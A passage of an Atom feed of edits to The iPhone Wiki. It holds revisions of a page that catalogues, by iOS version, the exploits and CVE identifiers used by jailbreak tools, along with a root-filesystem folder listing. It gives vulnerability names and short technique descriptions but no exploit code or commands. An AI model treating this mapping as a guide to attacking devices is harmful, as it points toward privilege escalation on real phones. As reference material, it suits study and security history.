* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})&lt;br /&gt;
&lt;br /&gt;
=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[Meridian]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})&lt;br /&gt;
&lt;br /&gt;
=== [[H3lix]] (10.0.1 - 10.3.4) ===&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 11.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2 &lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
===[[Electra]] (11.0-11.4.1)===&lt;br /&gt;
&lt;br /&gt;
11.0 - 11.1.2&lt;br /&gt;
&lt;br /&gt;
* IOSurface Kernel Exploit ({{cve|2017-13861}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.3.1&lt;br /&gt;
&lt;br /&gt;
* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})&lt;br /&gt;
* getvolattrlist (empty_list) ({{cve|2018-4243}})&lt;br /&gt;
&lt;br /&gt;
11.2 - 11.4.1&lt;br /&gt;
&lt;br /&gt;
* v1ntex ({{cve|2019-6225}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 12.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Chimera]] (12.0 - 12.2 / 12.4)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
12.0 - 12.1.2&lt;br /&gt;
&lt;br /&gt;
* voucher_swap ({{cve|2019-6225}}) &lt;br /&gt;
&lt;br /&gt;
12.0 - 12.2/12.4&lt;br /&gt;
&lt;br /&gt;
* SockPuppet ({{cve|2019-8605}})&lt;br /&gt;
&lt;br /&gt;
12.4.1&lt;br /&gt;
&lt;br /&gt;
* AppleAVE2Driver exploit ({{cve|2019-8795}})&lt;br /&gt;
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})&lt;br /&gt;
&lt;br /&gt;
12.4.2 - 12.4.8&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (12.3 - 12.4.8)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 13.x ==&lt;br /&gt;
&lt;br /&gt;
===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.3 (before version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* oob_timestamp ({{cve|2020-3837}})&lt;br /&gt;
* cuck00 information leak ({{cve|2020-3836}})&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)&lt;br /&gt;
&lt;br /&gt;
* tachy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
===[[Odyssey]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
13.0 - 13.5&lt;br /&gt;
&lt;br /&gt;
* tardy0n (LightSpeed) ({{cve|2020-9859}})&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)&lt;br /&gt;
&lt;br /&gt;
* FreeTheSandbox_LPE_POC_13.7&lt;br /&gt;
&lt;br /&gt;
13.5.1 - 13.7 (for devices with A8/A9 SoCs)&lt;br /&gt;
&lt;br /&gt;
* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (13.0 - 13.7)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 14.x ==&lt;br /&gt;
&lt;br /&gt;
===[[checkra1n]] (14.0 - 14.4)===&lt;br /&gt;
&lt;br /&gt;
* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})&lt;br /&gt;
&lt;br /&gt;
===[[unc0ver]] (14.0 - 14.3)===&lt;br /&gt;
&lt;br /&gt;
* (untitled exploit) ({{cve|2021-1782}})&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/&amp;diff=111120</id>
		<title>/</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/&amp;diff=111120"/>
		<updated>2021-02-28T20:22:27Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Folders */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;br /&gt;
This is the root directory for [[iOS]]. The firmware listing of these folders follow very closely to the [[wikipedia:Filesystem Hierarchy Standard|Filesystem Hierarchy Standard]] for [[wikipedia:Unix|Unix]] and [[wikipedia:Unix-like|Unix-like]] [[wikipedia:Operating system|operating systems]].&lt;br /&gt;
&lt;br /&gt;
== Children ==&lt;br /&gt;
=== Folders ===&lt;br /&gt;
* {{ipfw|.ba}}&lt;br /&gt;
* {{ipfw|.HFS+ Private Directory Data}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|.mb}}&lt;br /&gt;
* {{ipfw|AppleInternal}} ([[Apple Internal Apps|Apple Internal apps]] and [[Prototype Firmware|prototypes]]; only present in some internal iOS versions)&lt;br /&gt;
* {{ipfw|Applications}}&lt;br /&gt;
* {{ipfw|bin}}&lt;br /&gt;
* {{ipfw|boot}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|cores}}&lt;br /&gt;
* {{ipfw|dev}}&lt;br /&gt;
* {{ipfw|Developer}}&lt;br /&gt;
* {{ipfw|private/etc|etc}} ([[wikipedia:Symbolic link|symlink]] to &amp;lt;code&amp;gt;/private/etc&amp;lt;/code&amp;gt;)&lt;br /&gt;
* {{ipfw|Library}}&lt;br /&gt;
* {{ipfw|lib}} (not present in jailed iOS)&lt;br /&gt;
* {{ipfw|mnt}}&lt;br /&gt;
* {{ipfw|private}}&lt;br /&gt;
* {{ipfw|sbin}}&lt;br /&gt;
* {{ipfw|System}}&lt;br /&gt;
* {{ipfw|private/var/tmp|tmp}} (symlink to &amp;lt;code&amp;gt;/private/var/tmp&amp;lt;/code&amp;gt;)&lt;br /&gt;
* {{ipfw|private/var/mobile|User}} (symlink to &amp;lt;code&amp;gt;/private/var/mobile&amp;lt;/code&amp;gt; ({{ipfw|private/var/root|/private/var/root}} on [[iOS|iPhone OS]] 1.1.2 and below)&lt;br /&gt;
* {{ipfw|usr}}&lt;br /&gt;
* {{ipfw|private/var|var}} (symlink to &amp;lt;code&amp;gt;/private/var&amp;lt;/code&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
=== Files ===&lt;br /&gt;
* {{ipfw|.file}}&lt;br /&gt;
* {{ipfw|.Trashes}}&lt;br /&gt;
&lt;br /&gt;
== External Links ==&lt;br /&gt;
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html Filesystem Hierachy Standard 2.3]&lt;br /&gt;
* [https://developer.apple.com/library/mac/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html File System Basics (Apple)]&lt;br /&gt;
[[Category:Filesystem]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=/&amp;diff=111119</id>
		<title>/</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=/&amp;diff=111119"/>
		<updated>2021-02-28T20:22:09Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Folders */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__NOTOC__&lt;br /&gt;
This is the root directory for [[iOS]]. The firmware listing of these folders follow very closely to the [[wikipedia:Filesystem Hierarchy Standard|Filesystem Hierarchy Standard]] for [[wikipedia:Unix|Unix]] and [[wikipedia:Unix-like|Unix-like]] [[wikipedia:Operating system|operating systems]].&lt;br /&gt;
&lt;br /&gt;
== Children ==&lt;br /&gt;
=== Folders ===&lt;br /&gt;
* {{ipfw|.ba}}&lt;br /&gt;
* {{ipfw|.HFS+ Private Directory Data}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|.mb}}&lt;br /&gt;
* {{ipfw|AppleInternal}} ([[Apple Internal Apps|Apple Internal apps]] and [[Prototype Firmware|prototypes]]; only present in some internal iOS versions)&lt;br /&gt;
* {{ipfw|Applications}}&lt;br /&gt;
* {{ipfw|bin}}&lt;br /&gt;
* {{ipfw|boot}} (not present in the newer iOS versions)&lt;br /&gt;
* {{ipfw|cores}}&lt;br /&gt;
* {{ipfw|dev}}&lt;br /&gt;
* {{ipfw|Developer}}&lt;br /&gt;
* {{ipfw|private/etc|etc}} ([[wikipedia:Symbolic link|symlink]] to &amp;lt;code&amp;gt;/private/etc&amp;lt;/code&amp;gt;)&lt;br /&gt;
* {{ipfw|Library}}&lt;br /&gt;
* {{ipfw|lib}} (not present in the jailed iOS)&lt;br /&gt;
* {{ipfw|mnt}}&lt;br /&gt;
* {{ipfw|private}}&lt;br /&gt;
* {{ipfw|sbin}}&lt;br /&gt;
* {{ipfw|System}}&lt;br /&gt;
* {{ipfw|private/var/tmp|tmp}} (symlink to &amp;lt;code&amp;gt;/private/var/tmp&amp;lt;/code&amp;gt;)&lt;br /&gt;
* {{ipfw|private/var/mobile|User}} (symlink to &amp;lt;code&amp;gt;/private/var/mobile&amp;lt;/code&amp;gt; ({{ipfw|private/var/root|/private/var/root}} on [[iOS|iPhone OS]] 1.1.2 and below)&lt;br /&gt;
* {{ipfw|usr}}&lt;br /&gt;
* {{ipfw|private/var|var}} (symlink to &amp;lt;code&amp;gt;/private/var&amp;lt;/code&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
=== Files ===&lt;br /&gt;
* {{ipfw|.file}}&lt;br /&gt;
* {{ipfw|.Trashes}}&lt;br /&gt;
&lt;br /&gt;
== External Links ==&lt;br /&gt;
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html Filesystem Hierachy Standard 2.3]&lt;br /&gt;
* [https://developer.apple.com/library/mac/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html File System Basics (Apple)]&lt;br /&gt;
[[Category:Filesystem]]&lt;/div&gt;</summary>
		<author><name>Inflatable Man</name></author>
		
	</entry>
	<entry>
		<id>https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=111116</id>
		<title>Jailbreak Exploits</title>
		<link rel="alternate" type="text/html" href="https://www.theiphonewiki.com/w/index.php?title=Jailbreak_Exploits&amp;diff=111116"/>
		<updated>2021-02-28T01:31:04Z</updated>

		<summary type="html">&lt;p&gt;Inflatable Man: /* Programs used to jailbreak 14.x */  Added unc0ver 14's exploit&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This page lists the '''exploits''' used in [[jailbreak]]s.&lt;br /&gt;
&lt;br /&gt;
== Common exploits ==&lt;br /&gt;
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.&lt;br /&gt;
&lt;br /&gt;
* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])&lt;br /&gt;
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)&lt;br /&gt;
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])&lt;br /&gt;
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as &amp;quot;steaks4uce&amp;quot;) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])&lt;br /&gt;
&lt;br /&gt;
== Jailbreak Programs ==&lt;br /&gt;
=== [[PwnageTool]] (2.0 - 5.1.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[redsn0w]] (3.0 - 6.0) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 5.1.1&lt;br /&gt;
&lt;br /&gt;
=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* uses the exploits listed below to untether up to iOS 6.1.2&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 1.x ==&lt;br /&gt;
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===&lt;br /&gt;
* iBoot &amp;lt;code&amp;gt;cp&amp;lt;/code&amp;gt;-command exploit&lt;br /&gt;
&lt;br /&gt;
=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===&lt;br /&gt;
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})&lt;br /&gt;
&lt;br /&gt;
=== [[mknod|OktoPrep]] (1.1.2) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.2 from a jailbroken 1.1.1&lt;br /&gt;
* [[mknod]]&lt;br /&gt;
&lt;br /&gt;
=== [[Soft Upgrade]] (1.1.3) ===&lt;br /&gt;
&amp;quot;Upgrade&amp;quot; to 1.1.3 from a running jailbroken 1.1.2&lt;br /&gt;
&lt;br /&gt;
=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
* [[Ramdisk Hack]]&lt;br /&gt;
&lt;br /&gt;
=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 2.x ==&lt;br /&gt;
=== [[QuickPwn]] (2.0 - 2.2.1) ===&lt;br /&gt;
* uses [[Pwnage]] and [[Pwnage 2.0]]&lt;br /&gt;
&lt;br /&gt;
=== [[Redsn0w Lite]] (2.1.1) ===&lt;br /&gt;
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 3.x ==&lt;br /&gt;
=== [[purplera1n]] (3.0) ===&lt;br /&gt;
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===&lt;br /&gt;
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})&lt;br /&gt;
* uses [[0x24000 Segment Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===&lt;br /&gt;
* [[MobileBackup Copy Exploit]]&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[BPF_STX Kernel Write Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 4.x ==&lt;br /&gt;
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===&lt;br /&gt;
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})&lt;br /&gt;
* [[Incomplete Codesign Exploit]]&lt;br /&gt;
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})&lt;br /&gt;
&lt;br /&gt;
=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[Packet Filter Kernel Exploit]]&lt;br /&gt;
&lt;br /&gt;
=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===&lt;br /&gt;
* uses different common exploits&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[HFS Legacy Volume Name Stack Buffer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.&lt;br /&gt;
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})&lt;br /&gt;
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})&lt;br /&gt;
&lt;br /&gt;
=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===&lt;br /&gt;
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3&lt;br /&gt;
* [[ndrv_setspec() Integer Overflow]]&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (4.3 - 4.3.5) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 5.x ==&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]])  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Corona|Corona Untether]] (5.0.1)  ===&lt;br /&gt;
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})&lt;br /&gt;
* [[HFS Heap Overflow]] ({{cve|2012-0642}})&lt;br /&gt;
* unknown exploit ({{cve|2012-0643}})&lt;br /&gt;
&lt;br /&gt;
=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
&lt;br /&gt;
=== [[unthredeh4il]] (5.0-5.1.1) ===&lt;br /&gt;
Except for the [[iPad (3rd generation)]]&lt;br /&gt;
* MobileBackup2 Copy Exploit&lt;br /&gt;
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})&lt;br /&gt;
* [[AMFID code signing evasion]] ({{cve|2013-0977}})&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 6.x ==&lt;br /&gt;
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2)  ===&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})&lt;br /&gt;
* [[Timezone Vulnerability]]&lt;br /&gt;
* [[Shebang Trick]] ({{cve|2013-5154}})&lt;br /&gt;
* [[AMFID code signing evasion]]&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})&lt;br /&gt;
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})&lt;br /&gt;
* [[dynamic memmove() locating]]&lt;br /&gt;
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]&lt;br /&gt;
* [[kernel memory write via ROP gadget]]&lt;br /&gt;
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})&lt;br /&gt;
&lt;br /&gt;
=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===&lt;br /&gt;
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])&lt;br /&gt;
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]])&lt;br /&gt;
* [[launchd.conf untether]]&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 7.x ==&lt;br /&gt;
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===&lt;br /&gt;
{{Section Stub}}&lt;br /&gt;
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})&lt;br /&gt;
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})&lt;br /&gt;
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})&lt;br /&gt;
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})&lt;br /&gt;
&lt;br /&gt;
=== [[Geeksn0w]] (7.1 / 7.1.1) ===&lt;br /&gt;
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]&lt;br /&gt;
&lt;br /&gt;
=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)&lt;br /&gt;
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu &amp;gt;v1.0.0)&lt;br /&gt;
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})&lt;br /&gt;
* &amp;quot;syslogd chown&amp;quot; vulnerability&lt;br /&gt;
* enterprise certificate (no real exploit, used for initial &amp;quot;unsigned&amp;quot; code execution)&lt;br /&gt;
* &amp;quot;foo_extracted&amp;quot; symlink vulnerability (used to write to /var) ({{cve|2014-4386}})&lt;br /&gt;
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)&lt;br /&gt;
* VoIP backgrounding trick (used to auto restart the app)&lt;br /&gt;
* hidden segment attack&lt;br /&gt;
&lt;br /&gt;
== Programs used to jailbreak 8.x ==&lt;br /&gt;
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===&lt;br /&gt;
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)&lt;br /&gt;
* enterprise certificate (inside the IPA)&lt;br /&gt;
* a kind of dylib injection into a system process (see IPA)&lt;br /&gt;
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)&lt;br /&gt;
* a sandboxing problem in debugserver ({{cve|2014-4457}})&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)&lt;br /&gt;
* enable-dylibs-to-override-cache&lt;br /&gt;
* a new ovelapping segment attack ({{cve|2014-4455}})&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===&lt;br /&gt;
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])&lt;br /&gt;
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache&lt;br /&gt;
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load&lt;br /&gt;
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)&lt;br /&gt;
* MobileStorageMounter exploit ({{cve|2015-1062}})&lt;br /&gt;
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})&lt;br /&gt;
&lt;br /&gt;
Kernel:&lt;br /&gt;
&lt;br /&gt;
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses&lt;br /&gt;
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects&lt;br /&gt;
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory&lt;br /&gt;
&lt;br /&gt;
=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===&lt;br /&gt;
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)&lt;br /&gt;
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI&lt;br /&gt;
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)&lt;br /&gt;
* Symbolic linking to AFC ({{cve|2015-5746}})&lt;br /&gt;
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3802}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3803}})&lt;br /&gt;
* Code signing exploit ({{cve|2015-3805}})&lt;br /&gt;
